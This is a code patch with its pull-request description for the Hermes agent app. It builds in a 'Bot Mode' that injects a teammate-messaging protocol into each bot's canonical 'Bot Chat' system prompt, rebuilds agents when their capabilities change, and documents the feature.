+            for child in sorted(profiles.iterdir()):
+                if child.is_dir():
+                    entries.append((child.name, child))
+    except Exception:
+        pass
+    return entries
+
+
+def _soul_has_protocol(profile_dir: Path) -> bool:
+    try:
+        soul = profile_dir / "SOUL.md"
+        return soul.is_file() and _PROTOCOL_HEADING in soul.read_text(encoding="utf-8", errors="replace")
+    except Exception:
+        return False
+
+
+def _handle(name: str) -> str:
+    # The mention middleware aliases the default profile as @hermes.
+    return "hermes" if name == "default" else name
+
+
+def _build_section(home: Path) -> str:
+    root = _hermes_root(home)
+    me = _profile_name(home)
+
+    roster = _roster(root)
+    if not any(_is_bot_managed(d) for _n, d in roster):
+        return ""
+
+    # An older plugin build may have appended the protocol to SOUL.md
+    # already — never double it up.
+    my_dir = home if me == "default" else root / "profiles" / me
+    if _soul_has_protocol(my_dir):
+        return ""
+
+    handle = _handle(me)
+    teammates = ", ".join(f"`{n}`" for n, _d in roster if n != me) or "(none yet)"
+
+    return (
+        f"{_PROTOCOL_HEADING}\n"
+        "This install runs Bot Mode: each Hermes profile is an agent teammate with "
+        'one canonical "Bot Chat" conversation. To message a teammate, run on the '
+        "terminal tool (background=true, notify_on_complete=true), then finish your "
+        "turn — the reply arrives later as a new message:\n"
+        "```\n"
+        f'hermes -p <agent-name> chat --in ~ -c "Bot Chat" -Q -q "Message from 🤖 {handle} (@{handle}): your message"\n'
+        "```\n"
+        f'Always open with the "Message from 🤖 {handle} (@{handle}):" prefix so they '
+        "know who is talking. When YOU receive a message with that prefix, you are "
+        "being messaged by a teammate agent — address them (not the user) and reply "
+        "concisely. When the user says \"ask <name>\" or \"tell <name> ...\", that is a "
+        "handoff: message that agent, wait for the reply, and report back, saying "
+        "which agent it came from. Run `hermes profile list` for the LIVE teammate "
+        f"list before a handoff. Teammates at session start: {teammates}."
+    )
+
+
+def get_bot_mode_protocol_section(home: str | os.PathLike | None = None, *, force_refresh: bool = False) -> str:
+    """Cached probe entry point — one filesystem pass per (process, home).
+
+    ``home`` should be the AGENT'S OWN resolved home (session-db derived),
+    not the ambient HERMES_HOME — build threads can lose the ContextVar
+    override and the env var would then name the wrong profile.
+    """
+    resolved = str(home) if home else (os.getenv("HERMES_HOME") or os.path.expanduser("~/.hermes"))
+    with _lock:
+        if force_refresh or resolved not in _cached:
+            try:
+                _cached[resolved] = _build_section(Path(resolved))
+            except Exception:
+                _cached[resolved] = ""
+        return _cached[resolved]
+
+
+def _reset_cache_for_tests() -> None:
+    with _lock:
+        _cached.clear()

--- a/tools/bot_mode_probe.py
+++ b/tools/bot_mode_probe.py
@@ -1,10 +1,15 @@
-"""Bot Mode roster probe — stable-tier system prompt section.
+"""Bot Mode roster probe — canonical Bot Chat system prompt section.
 
 When the desktop's Bot Mode manages this install (any profile carries a
-``ui_meta['hermes-bots']`` block in its profile.yaml), every session of every
-profile gets a short "Messaging other agents" section so bots can hand off
-@mentions and reply to bot-to-bot DMs — including headless CLI sessions
-started by another bot via ``hermes -p <name> chat``.
+``ui_meta['hermes-bots']`` block in its profile.yaml), a bot's canonical
+"Bot Chat" session — and ONLY that session — gets a short "Messaging other
+agents" section so the bot can receive teammate DMs, reply with attribution,
+and hand off @mentions.  Regular sessions never carry the section; the
+desktop's composer middleware owns the @mention send path there.
+
+The caller (agent/system_prompt.py) enforces the session-title gate against
+``BOT_CHAT_TITLE``; this module answers "is this install Bot-Mode-managed,
+and what should the section say for this profile".
 
 This replaces the plugin-side SOUL.md backfill: the protocol is injected by
 the core at prompt-build time instead of appended to user-authored SOUL
@@ -29,6 +34,11 @@ import threading
 from pathlib import Path
 
 _PROTOCOL_HEADING = "## Messaging other agents"
+
+# The canonical per-bot conversation title — the only session shape that
+# receives the protocol section. Must match the desktop plugin's
+# createCanonicalChat title and the `-c "Bot Chat"` resume target.
+BOT_CHAT_TITLE = "Bot Chat"
 
 _lock = threading.Lock()
 _cached: dict[str, str] = {}

--- a/tools/bot_mode_probe.py
+++ b/tools/bot_mode_probe.py
@@ -191,12 +191,16 @@ def capability_fingerprint(home: str | os.PathLike | None = None) -> str:
     resolved = Path(str(home) if home else (os.getenv("HERMES_HOME") or os.path.expanduser("~/.hermes")))
     surface: dict = {}
     try:
-        import yaml
+        # Canonical loader (managed overlay + env expansion + normalization),
+        # scoped to the bot's home via the override the loaders already honor.
+        from hermes_cli.config import load_config_readonly
+        from hermes_constants import reset_hermes_home_override, set_hermes_home_override
 
-        cfg_path = resolved / "config.yaml"
-        cfg = {}
-        if cfg_path.is_file():
-            cfg = yaml.safe_load(cfg_path.read_text(encoding="utf-8", errors="replace")) or {}
+        token = set_hermes_home_override(str(resolved))
+        try:
+            cfg = load_config_readonly() or {}
+        finally:
+            reset_hermes_home_override(token)
         skills_cfg = cfg.get("skills") if isinstance(cfg.get("skills"), dict) else {}
         tools_cfg = cfg.get("tools") if isinstance(cfg.get("tools"), dict) else {}
         skills_cfg = skills_cfg or {}

--- a/tools/bot_mode_probe.py
+++ b/tools/bot_mode_probe.py
@@ -260,6 +260,33 @@ def stored_prompt_capability_stale(stored_prompt: str, home: str | os.PathLike |
         return False
 
 
+def stored_bot_chat_prompt_needs_upgrade(stored_prompt: str, home: str | os.PathLike | None = None) -> bool:
+    """True when a Bot Chat session's stored prompt PREDATES this feature.
+
+    Legacy Bot Chats (created before bundling / this epoch mechanism)
+    persisted prompts with no protocol section and no epoch stamp; without
+    an explicit upgrade they would be stranded forever — the staleness check
+    above only fires on stamped prompts. This is a one-time migration per
+    legacy session: the caller must only invoke it for sessions titled
+    "Bot Chat", and only rebuilds when the probe would actually emit a
+    section (a profile whose SOUL.md already carries the legacy plugin-side
+    append keeps its protocol-free prompt — rebuilding those would loop,
+    since the probe stays silent and the rebuilt prompt would be unstamped
+    again). Fails closed to "no upgrade".
+    """
+    try:
+        if _EPOCH_PREFIX in (stored_prompt or ""):
+            return False
+        if _PROTOCOL_HEADING in (stored_prompt or ""):
+            return False
+        # Only upgrade when the rebuild would actually add the section —
+        # this is what guarantees the rebuilt prompt carries a stamp and
+        # the upgrade can never re-fire.
+        return bool(get_bot_mode_protocol_section(home))
+    except Exception:
+        return False
+
+
 def _reset_cache_for_tests() -> None:
     with _lock:
         _cached.clear()

--- a/tui_gateway/methods_profiles.py
+++ b/tui_gateway/methods_profiles.py
@@ -159,7 +159,12 @@ def _(rid, params: dict) -> dict:
             except Exception:
                 row["has_avatar"] = False
             out.append(row)
-        return _ok(rid, {"profiles": out})
+        # Capability flag: this backend's prompt builder injects the Bot Mode
+        # teammate-messaging protocol (tools/bot_mode_probe.py) into every
+        # session of Bot-Mode-managed installs. Clients that would otherwise
+        # append the protocol to SOUL.md (the desktop's hermes-bots plugin)
+        # must skip their SOUL writes when this is present.
+        return _ok(rid, {"profiles": out, "bot_mode_protocol": True})
     except Exception as e:
         return _err(rid, 5061, str(e))
 

--- a/tui_gateway/server.py
+++ b/tui_gateway/server.py
@@ -4950,6 +4950,68 @@ def _apply_model_switch(
     }
 
 
+def _sync_bot_capabilities(sid: str, session: dict) -> None:
+    """Rebuild a Bot Chat session's agent when its capability surface changed.
+
+    Bot Chats are eternal sessions; toolsets/MCP tool definitions are baked
+    into the live agent at construction, so a capability edit (Settings →
+    Capabilities, skill install, MCP toggle) would otherwise not apply until
+    /new. At turn start, hash the profile's capability surface
+    (tools/bot_mode_probe.capability_fingerprint) and, on change, swap in a
+    freshly built agent for the SAME session — history is session/DB-backed,
+    and the prompt-restore epoch check rebuilds the system prompt to match.
+    One rebuild per user-initiated change; identical state is a no-op.
+    """
+    agent = session.get("agent")
+    if agent is None:
+        return
+    try:
+        title = str(getattr(agent, "_session_title_hint", "") or "").strip()
+        if not title:
+            db = getattr(agent, "_session_db", None)
+            key = session.get("session_key") or ""
+            title = str((db.get_session_title(key) if (db and key) else None) or "").strip()
+        if title != "Bot Chat":
+            return
+        from tools.bot_mode_probe import capability_fingerprint
+
+        home = session.get("profile_home") or None
+        current = capability_fingerprint(home)
+        if current == "unavailable":
+            return
+        seen = session.get("bot_caps_seen")
+        session["bot_caps_seen"] = current
+        if seen is None or seen == current:
+            return
+    except Exception:
+        return
+
+    # Capability surface changed — rebuild the agent in place. Same
+    # session_id/key, so the DB-backed history and (epoch-refreshed) system
+    # prompt carry over; only tool definitions and prompt bytes change.
+    try:
+        tokens = _set_session_context(sid, cwd=_session_cwd(session))
+        try:
+            new_agent = _make_agent(
+                sid,
+                session["session_key"],
+                session_id=session["session_key"],
+                platform_override=_session_source(session),
+            )
+        finally:
+            _clear_session_context(tokens)
+        new_agent._session_title_hint = "Bot Chat"
+        session["agent"] = new_agent
+        session["config_model_seen"] = _config_model_target()
+        _emit(
+            "notice",
+            sid,
+            {"message": "Capabilities updated — this bot's tools and prompt were refreshed."},
+        )
+    except Exception as e:
+        logger.warning("Bot capability sync failed for %s: %s", sid, e)
+
+
 def _sync_agent_model_with_config(sid: str, session: dict) -> None:
     """Adopt a config.yaml model change at turn start, like gateways do per
     message. Sessions pinned with /model keep their choice; a failed switch
@@ -10469,6 +10531,10 @@ def _run_prompt_submit(
         # child; delegate_task then captures it as non-serializable authority.
         transport_token = bind_transport(session.get("transport"))
         runtime_session_token = _current_runtime_session_record.set(session)
+        # Bound eagerly so the except/finally paths below always have an agent
+        # even if turn setup throws; re-read after _sync_bot_capabilities,
+        # which may swap in a rebuilt agent for Bot Chat sessions.
+        agent = session["agent"]
         approval_token = None
         session_tokens = []
         home_token = None  # per-turn HERMES_HOME override for a resumed remote profile
@@ -10529,6 +10595,11 @@ def _run_prompt_submit(
                 # config sync so an explicit pick wins over a config.yaml change.
                 _apply_pending_model_switch(sid, session)
                 _sync_agent_model_with_config(sid, session)
+            # Bot Chat capability sync — adopt Settings→Capabilities edits
+            # (skills/toolsets/MCP/SOUL) into the eternal bot session before
+            # the turn runs. No-op for every other session shape.
+            _sync_bot_capabilities(sid, session)
+            agent = session["agent"]
             # Snapshot after turn-start model sync. A deferred switch mutates
             # history and its version; that mutation belongs to this turn.
             with session["history_lock"]:

--- a/tui_gateway/server.py
+++ b/tui_gateway/server.py
@@ -2375,6 +2375,14 @@ def _start_agent_build(sid: str, session: dict) -> None:
             finally:
                 _clear_session_context(tokens)
 
+            # Bot Mode gate hint: the DB title lands post-first-turn
+            # (pending_title), but the system prompt builds at turn START —
+            # hand the agent its intended title so the "Bot Chat" protocol
+            # gate (agent/system_prompt.py) doesn't depend on write order.
+            _title_hint = str(current.get("pending_title") or "").strip()
+            if _title_hint:
+                agent._session_title_hint = _title_hint
+
             # Session DB row deferred to first run_conversation() call.
             # pending_title applied post-first-message (see cli.exec handler).
             current["agent"] = agent

--- a/website/docs/user-guide/desktop.md
+++ b/website/docs/user-guide/desktop.md
@@ -162,6 +162,27 @@ The app also surfaces the broader Hermes management surface so you don't have to
 - **Messaging** — set up gateway channels.
 - **Agents** and **Command Center** — orchestration surfaces for multi-agent work.
 
+### Bot Mode (built in)
+
+**Bot Mode** ships with the app and is on by default: a "one chat per agent"
+roster where every [Hermes profile](./profiles.md) appears as a bot with its
+own avatar (geometric face, uploaded image, AI-generated portrait, or a pixel
+pet), its own canonical **Bot Chat** conversation, and its own **Routines**
+(recurring tasks backed by Hermes cron). Create new agents from the roster —
+Name / Title / Description plus an Advanced disclosure with the full
+capabilities surface (model, SOUL, skills, toolsets, MCP servers) — group
+them into sections, and open group chats where several bots deliberate.
+
+Bots message each other: type `@researcher have a look at this` in any chat
+and the active bot hands the message off and reports back, and bots reach
+each other's Bot Chats directly (`hermes -p <bot> chat`). The backend teaches
+every session the messaging protocol automatically (config
+`agent.bot_mode_protocol`, default on) — including headless CLI sessions a
+teammate bot starts — so handoffs work without touching your SOUL.md.
+
+Don't want it? Flip it off in **Settings → Plugins → Bots** — the roster,
+routines pane, and composer middleware unregister live, no restart needed.
+
 ### Keyboard & navigation
 
 - **Command palette** — press **Cmd+K** or **Cmd+P** (Ctrl+K / Ctrl+P on Windows/Linux) to jump to actions and navigate the app from the keyboard: open any page or settings section, jump to a session by title or id, switch model/theme/color mode, spawn a terminal, restart the gateway, update Hermes, and more.

--- a/website/docs/user-guide/desktop.md
+++ b/website/docs/user-guide/desktop.md
@@ -176,9 +176,11 @@ them into sections, and open group chats where several bots deliberate.
 Bots message each other: type `@researcher have a look at this` in any chat
 and the active bot hands the message off and reports back, and bots reach
 each other's Bot Chats directly (`hermes -p <bot> chat`). The backend teaches
-every session the messaging protocol automatically (config
-`agent.bot_mode_protocol`, default on) — including headless CLI sessions a
-teammate bot starts — so handoffs work without touching your SOUL.md.
+each bot's canonical **Bot Chat** session the messaging protocol
+automatically (config `agent.bot_mode_protocol`, default on) — including
+when a teammate bot opens it headlessly from the CLI — so bot-to-bot
+replies and handoffs work without touching your SOUL.md, and your regular
+sessions stay untouched.
 
 Don't want it? Flip it off in **Settings → Plugins → Bots** — the roster,
 routines pane, and composer middleware unregister live, no restart needed.


### PR DESCRIPTION
## Summary
Bot Mode is now part of the desktop app: the Hermes-Bot-Mode plugin ships bundled and ON by default, and the bot-to-bot messaging protocol moves out of user SOUL.md files into a core stable-tier system-prompt section that covers every session of every profile — including the headless `hermes -p <bot> chat` sessions teammates start.

## Changes
- `apps/desktop/src/plugins/hermes-bots/` — adopted from NousResearch/Hermes-Bot-Mode @ c19baba + the multi-source roster (Hermes-Bot-Mode#68): the Bots panel merges the active gateway's profiles.list with the `host.agents()` union roster from #86875, showing bots from every registered Desktop connection (feature-detected; single-source behavior unchanged on older builds). Unchanged plugin.js form otherwise, `description` added for the Settings inventory; default-on, live-disable via Settings → Plugins
- `apps/desktop/src/contrib/plugins.ts` — bundled glob accepts `plugin.js`
- `apps/desktop/src/contrib/runtime-loader.ts` — disk/runtime copy of a bundled plugin id is skipped (pre-adoption standalone installs can't double-register)
- `apps/desktop/package.json` — `check:test:plugins` runs the plugin suite in js-tests CI
- `tools/bot_mode_probe.py` (+ system_prompt/agent_init/config_defaults wiring) — `agent.bot_mode_protocol` (default on): silent unless a profile carries `ui_meta['hermes-bots']`; silent when SOUL.md has the legacy section; cached per (process, home), keyed off the agent's own home; byte-stable across rebuilds
- `tui_gateway/methods_profiles.py` — `profiles.list` gains a `bot_mode_protocol` capability flag; the bundled plugin gates all SOUL protocol writes on it (backfill, composeSoul, Edit save). Older gateways keep the plugin-side SOUL-append fallback
- `website/docs/user-guide/desktop.md` — Bot Mode section

## Validation
| Check | Result |
|---|---|
| Plugin suite (node --test) | 143/143 |
| tests/tools/test_bot_mode_probe.py | 6/6 |
| tests/agent/test_system_prompt.py + env_probe | 39/39 |
| desktop check:lint (tsc ×3 + eslint) | 0 errors |
| contrib plugin/runtime-loader vitest | 10/10 |
| E2E real `build_system_prompt` | section present on managed home, byte-stable, flag-off absent, silent on plain installs (+916B only when managed) |

Supersedes the SOUL-backfill half of Hermes-Bot-Mode#99 — credit @kaduxo, whose handle fix, `hermes profile list` correction, and idempotent-append guards ship in the bundled plugin.

## Infographic

![Bot Mode built in](https://v3b.fal.media/files/b/0aa69972/j3GOzOQmlV3Md6WxR0oiH_7I7hC6jF.png)

